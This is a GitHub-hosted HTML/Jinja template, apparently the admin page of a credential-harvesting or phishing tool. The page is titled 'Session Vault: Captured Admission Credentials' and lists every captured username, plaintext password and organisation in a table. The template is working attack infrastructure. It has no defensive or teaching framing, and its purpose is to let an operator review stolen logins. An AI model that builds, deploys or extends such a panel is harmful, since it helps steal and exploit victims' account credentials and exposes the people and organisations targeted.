-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathadmin_portal.html
More file actions
47 lines (46 loc) · 2.04 KB
/
Copy pathadmin_portal.html
File metadata and controls
47 lines (46 loc) · 2.04 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Admin Core Space</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">
<style>body{background:#0f172a; color:#e2e8f0;}</style>
</head>
<body>
<div class="container py-5">
<div class="d-flex justify-content-between align-items-center mb-4">
<h3 class="text-info m-0">📋 Session Vault: Captured Admission Credentials</h3>
<div>
<a href="/admin/login" class="btn btn-outline-light btn-sm me-2">← Back to Login</a>
<a href="/" class="btn btn-danger btn-sm">Disconnect Admin</a>
</div>
</div>
<div class="card bg-dark p-4 border-secondary shadow">
<div class="table-responsive">
<table class="table table-dark table-striped border-secondary align-middle m-0">
<thead>
<tr>
<th>Token UID</th>
<th>Captured Username</th>
<th>Authentication Passphrase</th>
<th>Enterprise Unit Origin</th>
<th>Database Encryption Status</th>
</tr>
</thead>
<tbody>
{% for guest in guests %}
<tr>
<td class="font-monospace text-info">#MEM_REG_0{{ loop.index }}</td>
<td><strong>{{ guest.username }}</strong></td>
<td class="font-monospace text-warning">{{ guest.password }}</td>
<td>{{ guest.org }}</td>
<td><span class="badge bg-success">Stored Live Log</span></td>
</tr>
{% endfor %}
</tbody>
</table>
</div>
</div>
</div>
</body>
</html>